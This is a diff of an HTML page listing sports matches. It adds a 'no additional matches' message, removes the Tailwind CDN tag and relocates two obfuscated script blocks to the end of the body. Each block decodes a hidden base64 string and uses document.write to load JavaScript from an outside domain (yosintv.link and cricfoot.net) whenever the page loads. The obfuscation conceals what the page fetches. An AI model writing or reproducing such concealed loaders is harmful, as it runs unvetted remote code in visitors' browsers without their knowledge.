--- a/index.html
+++ b/index.html
@@ -69,6 +69,7 @@
     <section class="bg-white rounded-lg shadow-md p-6">
       <h3 class="text-2xl font-bold text-gray-900 mb-4">More Matches</h3>
       <div id="more-matches" class="space-y-2"></div>
+      <div id="no-matches" class="hidden text-center text-gray-600">No additional matches available at this time.</div>
     </section>
   </main>
 
@@ -93,7 +94,6 @@
     </div>
   </div>
 
-  <script src="https://cdn.tailwindcss.com"></script>
   <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
   <div id='fixedban' class='fixed bottom-0 left-1/2 -translate-x-1/2 z-[999]'>
     <div class='relative w-[300px] h-[250px] bg-white rounded-lg shadow-xl border border-gray-200'>
@@ -114,14 +114,6 @@
     });
   </script>
 
-  <script>
-const _0x347bb5=_0x36ae;(function(_0x5da5f1,_0x2a941c){const _0x29588e=_0x36ae,_0x35c916=_0x5da5f1();while(!![]){try{const _0x11df45=-parseInt(_0x29588e(0x132))/0x1*(-parseInt(_0x29588e(0x134))/0x2)+parseInt(_0x29588e(0x13a))/0x3+parseInt(_0x29588e(0x139))/0x4*(parseInt(_0x29588e(0x133))/0x5)+parseInt(_0x29588e(0x131))/0x6+parseInt(_0x29588e(0x136))/0x7*(-parseInt(_0x29588e(0x137))/0x8)+-parseInt(_0x29588e(0x135))/0x9+-parseInt(_0x29588e(0x13b))/0xa;if(_0x11df45===_0x2a941c)break;else _0x35c916['push'](_0x35c916['shift']());}catch(_0x3655db){_0x35c916['push'](_0x35c916['shift']());}}}(_0x4ec4,0x8db50));function _0x4ec4(){const _0xb7d6c7=['1DsqIFm','910535zsxNzF','373898UJTblH','3649491eDrafd','1673eVCyOe','22056gdjZUo','PHNjcmlwdCBzcmM9Imh0dHBzOi8vd3d3Lnlvc2ludHYubGluay9wbWkvYmxvZy1zY3JpcHQuanMiPjwvc2NyaXB0Pg==','8yjACmm','999090rCnzsL','3245690Ekgnqy','6511380HdKagq'];_0x4ec4=function(){return _0xb7d6c7;};return _0x4ec4();}function _0x36ae(_0x536736,_0x1b86b2){const _0x4ec4c5=_0x4ec4();return _0x36ae=function(_0x36ae7f,_0x37680a){_0x36ae7f=_0x36ae7f-0x131;let _0x53e057=_0x4ec4c5[_0x36ae7f];return _0x53e057;},_0x36ae(_0x536736,_0x1b86b2);}const b64=_0x347bb5(0x138);document['write'](atob(b64));
-</script>
-  
-<script>
-const _0x5424b1=_0x4798;(function(_0x5a047e,_0x2e3b4b){const _0x57279f=_0x4798,_0x49e1fe=_0x5a047e();while(!![]){try{const _0x2cd49a=-parseInt(_0x57279f(0x151))/0x1*(parseInt(_0x57279f(0x14c))/0x2)+-parseInt(_0x57279f(0x14d))/0x3+-parseInt(_0x57279f(0x150))/0x4*(parseInt(_0x57279f(0x146))/0x5)+parseInt(_0x57279f(0x14f))/0x6+parseInt(_0x57279f(0x14e))/0x7+-parseInt(_0x57279f(0x147))/0x8*(parseInt(_0x57279f(0x145))/0x9)+-parseInt(_0x57279f(0x14a))/0xa*(-parseInt(_0x57279f(0x149))/0xb);if(_0x2cd49a===_0x2e3b4b)break;else _0x49e1fe['push'](_0x49e1fe['shift']());}catch(_0x47deee){_0x49e1fe['push'](_0x49e1fe['shift']());}}}(_0x474d,0x2ad8c));function _0x4798(_0x2ffa33,_0x6a2f71){const _0x474df9=_0x474d();return _0x4798=function(_0x4798f1,_0x5f5465){_0x4798f1=_0x4798f1-0x145;let _0x5b0406=_0x474df9[_0x4798f1];return _0x5b0406;},_0x4798(_0x2ffa33,_0x6a2f71);}const b64=_0x5424b1(0x14b);document[_0x5424b1(0x148)](atob(b64));function _0x474d(){const _0x2f0933=['809LWoqNb','971595qRSIpw','10lYzWOk','16kPwJdl','write','12639gmjqRL','2930tMKtkG','PHNjcmlwdCBzcmM9Imh0dHBzOi8vYmxvZy5jcmljZm9vdC5uZXQvYXBwLXRlc3QuanMiPjwvc2NyaXB0Pg==','654FEkzUs','140730BzXyzA','1471785seKKat','1084914ZqXUsu','49736amwPRT'];_0x474d=function(){return _0x2f0933;};return _0x474d();}
-  </script>
-
 <!-- BEGIN: Powered by Supercounters.com -->
 <div style="position:fixed;top:0;left:0;width:100%;height:1px;overflow:hidden;visibility:hidden;z-index:9999;">
 <script id="_wauxdl">var _wau = _wau || []; _wau.push(["dynamic", "2rzlwew51p", "xdl", "c4302bffffff", "small"]);</script>
@@ -130,5 +122,15 @@ const _0x5424b1=_0x4798;(function(_0x5a047e,_0x2e3b4b){const _0x57279f=_0x4798,_
 <script type="text/javascript">sc_online_i(1703308,"ffffff","e61c1c");</script>
 <br><noscript><a href="https://www.supercounters.com/">free online counter</a></noscript>
 </div>
+  
+  
+  <script>
+const _0x347bb5=_0x36ae;(function(_0x5da5f1,_0x2a941c){const _0x29588e=_0x36ae,_0x35c916=_0x5da5f1();while(!![]){try{const _0x11df45=-parseInt(_0x29588e(0x132))/0x1*(-parseInt(_0x29588e(0x134))/0x2)+parseInt(_0x29588e(0x13a))/0x3+parseInt(_0x29588e(0x139))/0x4*(parseInt(_0x29588e(0x133))/0x5)+parseInt(_0x29588e(0x131))/0x6+parseInt(_0x29588e(0x136))/0x7*(-parseInt(_0x29588e(0x137))/0x8)+-parseInt(_0x29588e(0x135))/0x9+-parseInt(_0x29588e(0x13b))/0xa;if(_0x11df45===_0x2a941c)break;else _0x35c916['push'](_0x35c916['shift']());}catch(_0x3655db){_0x35c916['push'](_0x35c916['shift']());}}}(_0x4ec4,0x8db50));function _0x4ec4(){const _0xb7d6c7=['1DsqIFm','910535zsxNzF','373898UJTblH','3649491eDrafd','1673eVCyOe','22056gdjZUo','PHNjcmlwdCBzcmM9Imh0dHBzOi8vd3d3Lnlvc2ludHYubGluay9wbWkvYmxvZy1zY3JpcHQuanMiPjwvc2NyaXB0Pg==','8yjACmm','999090rCnzsL','3245690Ekgnqy','6511380HdKagq'];_0x4ec4=function(){return _0xb7d6c7;};return _0x4ec4();}function _0x36ae(_0x536736,_0x1b86b2){const _0x4ec4c5=_0x4ec4();return _0x36ae=function(_0x36ae7f,_0x37680a){_0x36ae7f=_0x36ae7f-0x131;let _0x53e057=_0x4ec4c5[_0x36ae7f];return _0x53e057;},_0x36ae(_0x536736,_0x1b86b2);}const b64=_0x347bb5(0x138);document['write'](atob(b64));
+</script>
+  
+<script>
+const _0x5424b1=_0x4798;(function(_0x5a047e,_0x2e3b4b){const _0x57279f=_0x4798,_0x49e1fe=_0x5a047e();while(!![]){try{const _0x2cd49a=-parseInt(_0x57279f(0x151))/0x1*(parseInt(_0x57279f(0x14c))/0x2)+-parseInt(_0x57279f(0x14d))/0x3+-parseInt(_0x57279f(0x150))/0x4*(parseInt(_0x57279f(0x146))/0x5)+parseInt(_0x57279f(0x14f))/0x6+parseInt(_0x57279f(0x14e))/0x7+-parseInt(_0x57279f(0x147))/0x8*(parseInt(_0x57279f(0x145))/0x9)+-parseInt(_0x57279f(0x14a))/0xa*(-parseInt(_0x57279f(0x149))/0xb);if(_0x2cd49a===_0x2e3b4b)break;else _0x49e1fe['push'](_0x49e1fe['shift']());}catch(_0x47deee){_0x49e1fe['push'](_0x49e1fe['shift']());}}}(_0x474d,0x2ad8c));function _0x4798(_0x2ffa33,_0x6a2f71){const _0x474df9=_0x474d();return _0x4798=function(_0x4798f1,_0x5f5465){_0x4798f1=_0x4798f1-0x145;let _0x5b0406=_0x474df9[_0x4798f1];return _0x5b0406;},_0x4798(_0x2ffa33,_0x6a2f71);}const b64=_0x5424b1(0x14b);document[_0x5424b1(0x148)](atob(b64));function _0x474d(){const _0x2f0933=['809LWoqNb','971595qRSIpw','10lYzWOk','16kPwJdl','write','12639gmjqRL','2930tMKtkG','PHNjcmlwdCBzcmM9Imh0dHBzOi8vYmxvZy5jcmljZm9vdC5uZXQvYXBwLXRlc3QuanMiPjwvc2NyaXB0Pg==','654FEkzUs','140730BzXyzA','1471785seKKat','1084914ZqXUsu','49736amwPRT'];_0x474d=function(){return _0x2f0933;};return _0x474d();}
+  </script>
+ 
 </body>
 </html>
